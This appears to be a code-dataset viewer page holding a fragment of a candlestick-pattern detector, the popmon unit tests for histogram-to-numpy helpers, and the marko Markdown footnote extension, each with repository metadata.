c1, h1, l1, o1 = candles['c'][1], candles['h'][1], candles['l'][1], candles['o'][1]

# Piercing pattern: first candle bearish (c0 < o0), second bullish (c1 > o1),
# and the second close pierces 50-100% into the first candle's real body.
if (c0 < o0) and (c1 > o1):
    if (c0 >= o1) and (c1 > c0) and (o0 >= c1):
        # Second candle opens at/below the first close, closes inside the
        # first body: measure how deep the close pierces into that body.
        # BUG FIX: the original condition had unbalanced parentheses
        # (a missing ')'), which was a SyntaxError.
        penetration = ((c1 - c0) / (o0 - c0)) * 100
        if 50 < penetration < 100:
            print("piercing pattern")
    # The case (c0 <= o1) and (o0 >= c1) is handled in the Bullish Harami.
    elif (c0 <= o1) and (o1 < o0) and (c1 >= o0):
        # Gap-down open with a close above the first candle's open.
        # BUG FIX: unbalanced parentheses here as well in the original.
        penetration = ((o0 - o1) / (o0 - c0)) * 100
        if 50 < penetration < 100:
            print("piercing pattern")
        # file.write("bearish Marabozu at " + str(i[0]) + "\n" + " c = " + str(c) + " h = " + str(h) + " o= " + str(o) + " l = " + str(l) + "\n\n")

print("end")
| 33.820513
| 136
| 0.490523
|
4a113406bec0041ba7c8b0d5a4fcd5838d381695
| 15,992
|
py
|
Python
|
tests/popmon/analysis/test_hist_numpy.py
|
sbrugman-ing/popmon
|
a2ede6b7d56772404e9921545b83886e1a9b3806
|
[
"MIT"
] | null | null | null |
tests/popmon/analysis/test_hist_numpy.py
|
sbrugman-ing/popmon
|
a2ede6b7d56772404e9921545b83886e1a9b3806
|
[
"MIT"
] | null | null | null |
tests/popmon/analysis/test_hist_numpy.py
|
sbrugman-ing/popmon
|
a2ede6b7d56772404e9921545b83886e1a9b3806
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import pytest
from popmon.analysis.hist_numpy import (
assert_similar_hists,
check_similar_hists,
get_2dgrid,
get_consistent_numpy_1dhists,
get_consistent_numpy_2dgrids,
get_consistent_numpy_entries,
get_contentType,
prepare_2dgrid,
set_2dgrid,
)
from popmon.hist.histogram import HistogramContainer
from popmon.hist.patched_histogrammer import histogrammar as hg
def to_ns(x):
    """Return timestamp *x* expressed as nanoseconds since 1970-01-01."""
    stamp = pd.to_datetime(x)
    return stamp.value
def unit(x):
    """Identity function: hand *x* back unchanged (used as histogram quantity)."""
    return x
def get_test_histograms1():
    """Build fixture set 1: a mixed-type df plus 1d/2d/3d histogram containers."""
    # dummy dataset with mixed types; timestamp column D is converted to
    # nanoseconds since 1970-01-01 so it can be binned numerically
    df = pd.util.testing.makeMixedDataFrame()
    df["date"] = df["D"].apply(to_ns)
    df["boolT"] = True
    df["boolF"] = False

    # build the histograms inside-out: categorical -> binned -> sparsely binned
    cat_hist = hg.Categorize(unit("C"))
    bin_hist = hg.Bin(5, 0, 5, unit("A"), value=cat_hist)
    sparse_hist = hg.SparselyBin(
        origin=pd.Timestamp("2009-01-01").value,
        binWidth=pd.Timedelta(days=1).value,
        quantity=unit("date"),
        value=bin_hist,
    )

    # fill each histogram with the same dataframe
    for h in (cat_hist, bin_hist, sparse_hist):
        h.fill.numpy(df)

    return (df,
            HistogramContainer(cat_hist),
            HistogramContainer(bin_hist),
            HistogramContainer(sparse_hist))
def get_test_histograms2():
    """Build fixture set 2: a mixed-type df plus four 1d/2d histogram containers."""
    # dummy dataset with mixed types (timestamp column D is left untouched here)
    df = pd.util.testing.makeMixedDataFrame()

    # two nesting orders over the same axes: Bin-of-Categorize and Categorize-of-Bin
    cat_hist = hg.Categorize(unit("C"))
    bin_of_cat = hg.Bin(5, 0, 5, unit("A"), value=cat_hist)
    plain_bin = hg.Bin(5, 0, 5, unit("A"))
    cat_of_bin = hg.Categorize(unit("C"), value=plain_bin)

    # fill all four histograms with the same dataframe
    for h in (cat_hist, bin_of_cat, plain_bin, cat_of_bin):
        h.fill.numpy(df)

    return (df,
            HistogramContainer(cat_hist),
            HistogramContainer(bin_of_cat),
            HistogramContainer(plain_bin),
            HistogramContainer(cat_of_bin))
def test_histogram():
    """Sanity-check entry counts, dimensionality and size of the fixture hists."""
    df, hc1, hc2, hc3 = get_test_histograms1()
    h1, h2, h3 = hc1.hist, hc2.hist, hc3.hist
    # 1d categorical: 5 entries over 5 distinct categories
    assert (h1.entries, h1.n_dim, h1.size) == (5, 1, 5)
    # 2d binned-of-categorical: 5 entries over 5 bins
    assert (h2.entries, h2.n_dim, h2.num) == (5, 2, 5)
    # 3d sparsely-binned date axis: 5 entries spread over 7 sparse bins
    assert (h3.entries, h3.n_dim, h3.num) == (5, 3, 7)
def test_get_contentType():
    """get_contentType should report the histogrammar type name of each hist."""
    df, hc1, hc2, hc3 = get_test_histograms1()
    expected = ["Categorize", "Bin", "SparselyBin"]
    for hc, type_name in zip([hc1, hc2, hc3], expected):
        assert get_contentType(hc.hist) == type_name
@pytest.mark.filterwarnings("ignore:Input histogram only has")
def test_prepare_2dgrid():
    """Test preparation of grid for extraction of number of entries for 2d hists"""
    df, hc1, hc2, hc3 = get_test_histograms1()
    # building 1d-, 2d-, and 3d-histogram (iteratively)
    hist1 = hg.Categorize(unit("C"))
    hist2 = hg.Bin(5, 0, 5, unit("A"), value=hist1)
    hist3 = hg.SparselyBin(
        origin=pd.Timestamp("2009-01-01").value,
        binWidth=pd.Timedelta(days=1).value,
        quantity=unit("date"),
        value=hist2,
    )
    # fill them
    hist1.fill.numpy(df)
    hist2.fill.numpy(df)
    hist3.fill.numpy(df)
    # prepare_2dgrid returns the x/y axis keys present in each histogram
    xkeys1, ykeys1 = prepare_2dgrid(hist1)
    xkeys2, ykeys2 = prepare_2dgrid(hist2)
    xkeys3, ykeys3 = prepare_2dgrid(hist3)
    # a 1d histogram cannot yield a 2d grid -> empty key lists
    # (the corresponding warning is filtered by the mark above)
    np.testing.assert_array_equal(xkeys1, [])
    np.testing.assert_array_equal(ykeys1, [])
    np.testing.assert_array_equal(xkeys2, [0, 1, 2, 3, 4])
    np.testing.assert_array_equal(ykeys2, ["foo1", "foo2", "foo3", "foo4", "foo5"])
    # sparse (date) axis: only the bins that were actually filled show up
    np.testing.assert_array_equal(xkeys3, [0, 1, 4, 5, 6])
    np.testing.assert_array_equal(ykeys3, [0, 1, 2, 3, 4])
@pytest.mark.filterwarnings("ignore:Input histogram only has")
def test_set_2dgrid():
    """Test setting the grid for extraction of number of entries for 2d hists"""
    df, hc1, hc2, hc3 = get_test_histograms1()
    hist1 = hc1.hist
    hist2 = hc2.hist
    hist3 = hc3.hist
    # derive the axis keys first, then fill the entries into a dense 2d grid
    xkeys1, ykeys1 = prepare_2dgrid(hist1)
    xkeys2, ykeys2 = prepare_2dgrid(hist2)
    xkeys3, ykeys3 = prepare_2dgrid(hist3)
    grid1 = set_2dgrid(hist1, xkeys1, ykeys1)
    grid2 = set_2dgrid(hist2, xkeys2, ykeys2)
    grid3 = set_2dgrid(hist3, xkeys3, ykeys3)
    # the fixture's 5 rows map each A-bin to exactly one C-category,
    # so both 2d grids come out as a 5x5 identity pattern
    grid_comp = np.asarray(
        [
            [1.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 1.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 1.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 1.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 1.0],
        ]
    )
    # 1d histogram -> empty grid (warning filtered by the mark above)
    assert (grid1 == np.zeros((0, 0))).all()
    assert (grid2 == grid_comp).all()
    assert (grid3 == grid_comp).all()
@pytest.mark.filterwarnings("ignore:Input histogram only has")
def test_get_2dgrid():
    """Test extraction of number of entries for 2d hists"""
    df, hc1, hc2, hc3 = get_test_histograms1()
    hist1 = hc1.hist
    hist2 = hc2.hist
    hist3 = hc3.hist
    # get_2dgrid is the one-call convenience wrapper around
    # prepare_2dgrid + set_2dgrid (compare test_set_2dgrid above)
    grid1 = get_2dgrid(hist1)
    grid2 = get_2dgrid(hist2)
    grid3 = get_2dgrid(hist3)
    # same 5x5 identity pattern as in test_set_2dgrid: each A-bin of the
    # fixture maps to exactly one C-category
    grid_comp = np.asarray(
        [
            [1.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 1.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 1.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 1.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 1.0],
        ]
    )
    # 1d histogram -> empty grid (warning filtered by the mark above)
    assert (grid1 == np.zeros((0, 0))).all()
    assert (grid2 == grid_comp).all()
    assert (grid3 == grid_comp).all()
def test_get_consistent_numpy_2dgrids():
    """Test extraction of number of entries for 2d hists

    When first making bin_edges of input histograms consistent to each other.
    """
    # two datasets with overlapping but different value ranges / categories,
    # so the function must first align bin edges and category labels
    df1 = pd.DataFrame(
        {
            "A": [0, 1, 2, 3, 4, 3, 2, 1, 1, 1],
            "C": ["f1", "f3", "f4", "f3", "f4", "f2", "f2", "f1", "f3", "f4"],
        }
    )
    df2 = pd.DataFrame(
        {
            "A": [2, 3, 4, 5, 7, 4, 6, 5, 7, 8],
            "C": ["f7", "f3", "f5", "f8", "f9", "f2", "f3", "f6", "f7", "f7"],
        }
    )
    # building 1d-, 2d-, and 3d-histogram (iteratively)
    hist0 = hg.Categorize(unit("C"))
    hist1 = hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"), value=hist0)
    hist2 = hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"), value=hist0)
    # fill them
    hist0.fill.numpy(df1)
    hist1.fill.numpy(df1)
    hist2.fill.numpy(df2)
    hc0 = HistogramContainer(hist0)
    hc1 = HistogramContainer(hist1)
    hc2 = HistogramContainer(hist2)
    # hc0 is 1-dimensional, so asking for a 2d grid must raise; capture the
    # exception message for the assert further down
    args = [""]
    try:
        get_consistent_numpy_2dgrids([hc0, hc0])
    except ValueError as e:
        args = e.args
    grid2d_list = get_consistent_numpy_2dgrids([hc1, hc2])
    # expected 9x9 grids: rows are the aligned A-bins 0..8, columns the
    # union of category labels f1..f9 (sorted); entries count occurrences
    g1 = np.asarray(
        [
            [1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 2.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
        ]
    )
    g2 = np.asarray(
        [
            [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
            [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0],
        ]
    )
    grid2d_comp = [g1, g2]
    # MB 20190828: not sure if this is the right way to test for exceptions.
    assert (
        args[0] == "Input histogram only has 1 dimensions (<2). Cannot compute 2d-grid."
    )
    for i in range(2):
        assert (grid2d_list[i] == grid2d_comp[i]).all()
def test_get_consistent_numpy_1dhists():
    """Test extraction of number of entries and bin-edges/labels

    When first making bin_edges/bin-labels of input histograms consistent to each other.
    """
    # two datasets with overlapping value ranges (0..4 and 2..8), so the
    # consistent bin edges must span the union 0..9
    df1 = pd.DataFrame({"A": [0, 1, 2, 3, 4, 3, 2, 1, 1, 1]})
    df2 = pd.DataFrame({"A": [2, 3, 4, 5, 7, 4, 6, 5, 7, 8]})
    # building 1d-, 2d-, and 3d-histogram (iteratively)
    hist1 = hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"))
    hist2 = hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"))
    # fill them
    hist1.fill.numpy(df1)
    hist2.fill.numpy(df2)
    hc1 = HistogramContainer(hist1)
    hc2 = HistogramContainer(hist2)
    # without labels: list of (entries, bin_edges) per input histogram;
    # with labels: the same list plus the shared bin centers
    nphist1, nphist2 = get_consistent_numpy_1dhists([hc1, hc2], get_bin_labels=False)
    nphist_list, centers = get_consistent_numpy_1dhists([hc1, hc2], get_bin_labels=True)
    # expected entry counts per aligned bin, shared edges 0..9, centers at .5
    entries1 = [1.0, 4.0, 2.0, 2.0, 1.0, 0.0, 0.0, 0.0, 0.0]
    entries2 = [0.0, 0.0, 1.0, 1.0, 2.0, 2.0, 1.0, 2.0, 1.0]
    bin_edges = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0]
    bin_centers = [0.5, 1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5, 8.5]
    np.testing.assert_array_equal(nphist1[0], entries1)
    np.testing.assert_array_equal(nphist1[1], bin_edges)
    np.testing.assert_array_equal(nphist2[0], entries2)
    np.testing.assert_array_equal(nphist2[1], bin_edges)
    np.testing.assert_array_equal(nphist_list[0][0], entries1)
    np.testing.assert_array_equal(nphist_list[0][1], bin_edges)
    np.testing.assert_array_equal(nphist_list[1][0], entries2)
    np.testing.assert_array_equal(nphist_list[1][1], bin_edges)
    np.testing.assert_array_equal(centers, bin_centers)
def test_get_consistent_numpy_entries():
    """Test extraction of number of entries

    When first making bin_edges of input histograms consistent to each other.
    """
    # two datasets with partially overlapping numeric ranges and categories
    df1 = pd.DataFrame(
        {
            "A": [0, 1, 2, 3, 4, 3, 2, 1, 1, 1],
            "C": ["f1", "f3", "f4", "f3", "f4", "f2", "f2", "f1", "f3", "f4"],
        }
    )
    df2 = pd.DataFrame(
        {
            "A": [2, 3, 4, 5, 7, 4, 6, 5, 7, 8],
            "C": ["f7", "f3", "f5", "f8", "f9", "f2", "f3", "f6", "f7", "f7"],
        }
    )
    # building 1d-, 2d-, and 3d-histogram (iteratively)
    # hist0/hist1: categorical (column C); hist2/hist3: sparse numeric (column A)
    hist0 = HistogramContainer(hg.Categorize(unit("C")))
    hist1 = HistogramContainer(hg.Categorize(unit("C")))
    hist2 = HistogramContainer(
        hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"))
    )
    hist3 = HistogramContainer(
        hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"))
    )
    # fill them
    for hist, df in zip([hist0, hist1, hist2, hist3], [df1, df2, df1, df2]):
        hist.hist.fill.numpy(df)
    # entries aligned over the union of labels (categorical) resp. bins (numeric)
    e0, e1 = get_consistent_numpy_entries([hist0, hist1], get_bin_labels=False)
    _, labels01 = get_consistent_numpy_entries([hist0, hist1], get_bin_labels=True)
    e2, e3 = get_consistent_numpy_entries([hist2, hist3], get_bin_labels=False)
    _, centers23 = get_consistent_numpy_entries([hist2, hist3], get_bin_labels=True)
    # expected counts over the union labels f1..f9 resp. aligned bins 0..8
    entries0 = [2.0, 2.0, 3.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0]
    entries1 = [0.0, 1.0, 2.0, 0.0, 1.0, 1.0, 3.0, 1.0, 1.0]
    labels = ["f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9"]
    entries2 = [1.0, 4.0, 2.0, 2.0, 1.0, 0.0, 0.0, 0.0, 0.0]
    entries3 = [0.0, 0.0, 1.0, 1.0, 2.0, 2.0, 1.0, 2.0, 1.0]
    centers = [0.5, 1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5, 8.5]
    np.testing.assert_array_equal(e0, entries0)
    np.testing.assert_array_equal(e1, entries1)
    np.testing.assert_array_equal(labels01, labels)
    np.testing.assert_array_equal(e2, entries2)
    np.testing.assert_array_equal(e3, entries3)
    np.testing.assert_array_equal(centers23, centers)
@pytest.mark.filterwarnings("ignore:Input histograms have inconsistent")
def test_check_similar_hists():
    """Test similarity of list of histograms

    Check similarity of: type, n-dim, sub-hists, specific type attributes
    """
    # dummy dataset with mixed types
    # convert timestamp (col D) to nanosec since 1970-1-1
    df = pd.util.testing.makeMixedDataFrame()
    df["date"] = df["D"].apply(to_ns)
    # building 1d-, 2d-, and 3d-histogram (iteratively)
    # pairs constructed to be pairwise dissimilar:
    # hist0 vs hist1 differ in type, hist2 vs hist3 in nesting order,
    # hist4 vs hist5 in their nested sub-histogram
    hist0 = hg.Bin(5, 0, 5, unit("A"))
    hist1 = hg.Categorize(unit("C"))
    hist2 = hg.Bin(5, 0, 5, unit("A"), value=hist1)
    hist3 = hg.Categorize(unit("C"), value=hist0)
    hist4 = hg.SparselyBin(
        origin=pd.Timestamp("2009-01-01").value,
        binWidth=pd.Timedelta(days=1).value,
        quantity=unit("date"),
        value=hist2,
    )
    hist5 = hg.SparselyBin(
        origin=pd.Timestamp("2009-01-01").value,
        binWidth=pd.Timedelta(days=1).value,
        quantity=unit("date"),
        value=hist3,
    )
    # fill them
    for hist in [hist0, hist1, hist2, hist3, hist4, hist5]:
        hist.fill.numpy(df)
    hc0 = HistogramContainer(hist0)
    hc1 = HistogramContainer(hist1)
    hc2 = HistogramContainer(hist2)
    hc3 = HistogramContainer(hist3)
    hc4 = HistogramContainer(hist4)
    hc5 = HistogramContainer(hist5)
    # every histogram is similar to itself ...
    for hc in [hc0, hc1, hc2, hc3, hc4, hc5]:
        assert check_similar_hists([hc, hc])
    # ... but none of the constructed pairs are similar to each other
    assert not check_similar_hists([hc0, hc1])
    assert not check_similar_hists([hc2, hc3])
    assert not check_similar_hists([hc4, hc5])
@pytest.mark.filterwarnings("ignore:Input histograms have inconsistent")
def test_assert_similar_hists():
    """Test assert on similarity of list of histograms

    Check similarity of: type, n-dim, sub-hists, specific type attributes
    """
    # dummy dataset with mixed types
    # convert timestamp (col D) to nanosec since 1970-1-1
    df = pd.util.testing.makeMixedDataFrame()
    df["date"] = df["D"].apply(to_ns)
    # building 1d-, 2d-, and 3d-histogram (iteratively)
    # same pairwise-dissimilar construction as in test_check_similar_hists
    hist0 = hg.Bin(5, 0, 5, unit("A"))
    hist1 = hg.Categorize(unit("C"))
    hist2 = hg.Bin(5, 0, 5, unit("A"), value=hist1)
    hist3 = hg.Categorize(unit("C"), value=hist0)
    hist4 = hg.SparselyBin(
        origin=pd.Timestamp("2009-01-01").value,
        binWidth=pd.Timedelta(days=1).value,
        quantity=unit("date"),
        value=hist2,
    )
    hist5 = hg.SparselyBin(
        origin=pd.Timestamp("2009-01-01").value,
        binWidth=pd.Timedelta(days=1).value,
        quantity=unit("date"),
        value=hist3,
    )
    # fill them
    for hist in [hist0, hist1, hist2, hist3, hist4, hist5]:
        hist.fill.numpy(df)
    hc0 = HistogramContainer(hist0)
    hc1 = HistogramContainer(hist1)
    hc2 = HistogramContainer(hist2)
    hc3 = HistogramContainer(hist3)
    hc4 = HistogramContainer(hist4)
    hc5 = HistogramContainer(hist5)
    # identical histograms must pass the similarity check
    for hc in [hc0, hc1, hc2, hc3, hc4, hc5]:
        assert check_similar_hists([hc, hc])
    # dissimilar pairs must raise; capture each exception message
    args01 = [""]
    args23 = [""]
    args45 = [""]
    try:
        assert_similar_hists([hc0, hc1])
    except ValueError as e:
        args01 = e.args
    try:
        assert_similar_hists([hc2, hc3])
    except ValueError as e:
        args23 = e.args
    try:
        assert_similar_hists([hc4, hc5])
    except ValueError as e:
        args45 = e.args
    assert args01[0] == "Input histograms are not all similar."
    assert args23[0] == "Input histograms are not all similar."
    assert args45[0] == "Input histograms are not all similar."
def test_datatype():
    """Histograms should expose the python/numpy datatypes of their axes."""
    df, hc1, hc2, hc3 = get_test_histograms1()
    # 1d categorical axis -> plain str
    assert hc1.hist.datatype == str
    # nested axes report one datatype per dimension, outermost first
    np.testing.assert_array_equal(hc2.hist.datatype, [np.float64, str])
    np.testing.assert_array_equal(hc3.hist.datatype, [np.datetime64, np.float64, str])
| 31.856574
| 88
| 0.597361
|
4a11350e30ab396f3e3e1f0b0244409c7ed17619
| 3,160
|
py
|
Python
|
src/tools/md2amiga/marko/ext/footnote.py
|
dMajoIT/aqb
|
7d9bc71f8bdc64a6edc49fec6815b42bb3050fda
|
[
"MIT"
] | 161
|
2018-08-20T07:42:44.000Z
|
2022-03-31T03:17:44.000Z
|
src/tools/md2amiga/marko/ext/footnote.py
|
dMajoIT/aqb
|
7d9bc71f8bdc64a6edc49fec6815b42bb3050fda
|
[
"MIT"
] | 102
|
2018-10-15T01:19:06.000Z
|
2022-03-11T13:37:00.000Z
|
src/tools/md2amiga/marko/ext/footnote.py
|
dMajoIT/aqb
|
7d9bc71f8bdc64a6edc49fec6815b42bb3050fda
|
[
"MIT"
] | 39
|
2019-04-07T08:13:01.000Z
|
2022-02-01T15:40:59.000Z
|
"""
Footnotes extension
~~~~~~~~~~~~~~~~~~~
Enable footnotes parsing and renderering in Marko.
Usage::
from marko import Markdown
text = 'Foo[^1]\\n\\n[^1]: This is a footnote.\\n'
markdown = Markdown(extensions=['footnote'])
print(markdown(text))
"""
import re
from marko import block, inline, helpers
class Document(block.Document):
    """Marko document root that additionally collects footnote definitions.

    ``footnotes`` maps a normalized footnote label to its ``FootnoteDef``
    element; ``FootnoteRef.find`` consults it to decide whether a reference
    is valid.
    """

    def __init__(self, text):
        # Must be created before super().__init__: parsing the text registers
        # FootnoteDef elements into this dict (see FootnoteDef.parse).
        self.footnotes = {}
        super().__init__(text)
class FootnoteDef(block.BlockElement):
    """Block element for a footnote definition: ``[^label]: content``.

    Parsed definitions are registered on the root ``Document`` so that
    ``FootnoteRef`` can later check whether a label has a definition.
    """

    # up to 3 leading spaces, then "[^label]:", then optional non-newline
    # whitespace, followed by content or a 4-space-indented continuation
    pattern = re.compile(r" {,3}\[\^([^\]]+)\]:[^\n\S]*(?=\S| {4})")
    priority = 6

    def __init__(self, match):
        self.label = helpers.normalize_label(match.group(1))
        # prefixes used by marko to strip the marker from the first line and
        # the indentation from continuation lines of the definition body
        self._prefix = re.escape(match.group())
        self._second_prefix = r" {1,4}"

    @classmethod
    def match(cls, source):
        return source.expect_re(cls.pattern)

    @classmethod
    def parse(cls, source):
        state = cls(source.match)
        # parse the definition body as child blocks within this element's state
        with source.under_state(state):
            state.children = block.parser.parse(source)
        # register the parsed definition on the document root, keyed by label
        source.root.footnotes[state.label] = state
        return state
class FootnoteRef(inline.InlineElement):
    """Inline element for a footnote reference: ``[^label]``."""

    pattern = re.compile(r"\[\^([^\]]+)\]")
    priority = 6

    def __init__(self, match):
        self.label = helpers.normalize_label(match.group(1))

    @classmethod
    def find(cls, text):
        # Only yield matches whose label has a registered definition;
        # references to undefined labels stay as literal text.
        # NOTE(review): relies on marko's module-global `inline._root_node`
        # pointing at the current Document during inline parsing — confirm
        # against the marko version in use.
        for match in super().find(text):
            label = helpers.normalize_label(match.group(1))
            if label in inline._root_node.footnotes:
                yield match
class FootnoteRendererMixin:
    """Renderer mixin emitting footnote refs inline and the footnote list last.

    ``self.footnotes`` records referenced labels in first-use order; the
    matching definitions are rendered as an ordered list that is appended
    to the document output in ``render_document``.
    """

    def __init__(self):
        super().__init__()
        # labels in the order they were first referenced (determines numbering)
        self.footnotes = []

    def render_footnote_ref(self, element):
        # the first reference to a label assigns it the next footnote number
        if element.label not in self.footnotes:
            self.footnotes.append(element.label)
        idx = self.footnotes.index(element.label) + 1
        return (
            '<sup class="footnote-ref" id="fnref-{lab}">'
            '<a href="#fn-{lab}">{id}</a></sup>'.format(
                lab=self.escape_url(element.label), id=idx
            )
        )

    def render_footnote_def(self, element):
        # definitions produce no output in place; they are emitted at the end
        # of the document via _render_footnote_def
        return ""

    def _render_footnote_def(self, element):
        # render the definition body and append a back-link to the reference
        children = self.render_children(element).rstrip()
        back = f'<a href="#fnref-{element.label}" class="footnote">↩</a>'
        if children.endswith("</p>"):
            # tuck the back-link inside the final paragraph
            # NOTE(review): `back` is used as a re.sub replacement string, so a
            # label containing backslashes would be misinterpreted — confirm
            # labels are normalized to exclude them.
            children = re.sub(r"</p>$", f"{back}</p>", children)
        else:
            children = f"{children}<p>{back}</p>\n"
        return '<li id="fn-{}">\n{}</li>\n'.format(
            self.escape_url(element.label), children
        )

    def render_document(self, element):
        text = self.render_children(element)
        # look up the referenced definitions in first-use order
        items = [self.root_node.footnotes[label] for label in self.footnotes]
        if not items:
            return text
        children = "".join(self._render_footnote_def(item) for item in items)
        footnotes = f'<div class="footnotes">\n<ol>\n{children}</ol>\n</div>\n'
        # reset state so the same renderer instance can render another document
        self.footnotes = []
        return text + footnotes
class Footnote:
    """Marko extension bundle: footnote elements plus the renderer mixin."""

    # parser elements (Document override + block/inline footnote elements)
    elements = [Document, FootnoteDef, FootnoteRef]
    # mixin merged into the renderer class by marko
    renderer_mixins = [FootnoteRendererMixin]
def make_extension():
    """Entry point used by marko to instantiate the footnote extension."""
    return Footnote()
| 27.964602
| 79
| 0.596835
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.